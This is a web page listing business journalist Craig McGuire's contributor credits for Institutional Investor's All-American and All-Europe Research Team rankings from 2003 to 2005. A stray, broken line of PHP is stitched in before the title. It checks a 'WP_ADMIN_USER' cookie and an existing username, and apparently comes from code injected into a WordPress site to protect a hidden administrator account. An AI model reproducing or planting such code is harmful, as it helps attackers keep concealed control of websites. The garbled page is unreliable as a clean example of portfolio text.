if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Institutional Investor Magazine – By Craig McGuire

Institutional Investor Magazine

For three years, business journalist Craig McGuire served as a Contributor for Institutional Investor Magazine working on successive issues of the high-profile annual “All-American Research Team” and “All-Europe Research Team” rankings. Institutional Investor is a leading international business to business publisher, focused primarily on international finance. It publishes magazines, newsletters and journals as well as research, directories, books and maps. It also runs conferences, seminars and training courses and is a provider of electronic business information through its capital market databases and emerging markets information service.


Institutional Investor: “The 2003 All-American Research Team” – Contributor Credits

Institutional Investor: “The 2003 All-American Research Team” – Computer Services Sector Coverage
Institutional Investor: “The 2003 All-American Research Team” – Internet Sector Coverage
Institutional Investor: “The 2003 All-American Research Team” – IT Hardware Sector Coverage
Institutional Investor: “The 2003 All-American Research Team” – Telecom Services Sector Coverage


Institutional Investor: “The 2004 All-American Research Team” – Contributor Credits

Institutional Investor: “The 2004 All-American Research Team” – Apparel Sector Coverage
Institutional Investor: “The 2004 All-American Research Team” – Automotive Sector Coverage
Institutional Investor: “The 2004 All-American Research Team” – Home Builder Sector Coverage
Institutional Investor: “The 2004 All-American Research Team” – Internet Sector Coverage


Institutional Investor: “The 2004 All-Europe Research Team” – Contributor Credits

Institutional Investor: “The 2004 All-Europe Research Team” – Aerospace & Defense Sector Coverage
Institutional Investor: “The 2004 All-Europe Research Team” – Auto & Auto Parts Sector Coverage
Institutional Investor: “The 2004 All-Europe Research Team” – Engineering Sector Coverage
Institutional Investor: “The 2004 All-Europe Research Team” – Telecommunications Sector Coverage


Institutional Investor: “The 2005 All-Europe Research Team” – Contributor Credits

Institutional Investor: “The 2005 All-Europe Research Team” – Aerospace Sector Coverage
Institutional Investor: “The 2005 All-Europe Research Team” – Automotive Sector Coverage
Institutional Investor: “The 2005 All-Europe Research Team” – Transportation Sector Coverage
Institutional Investor: “The 2005 All-Europe Research Team” – Telecommunications Sector Coverage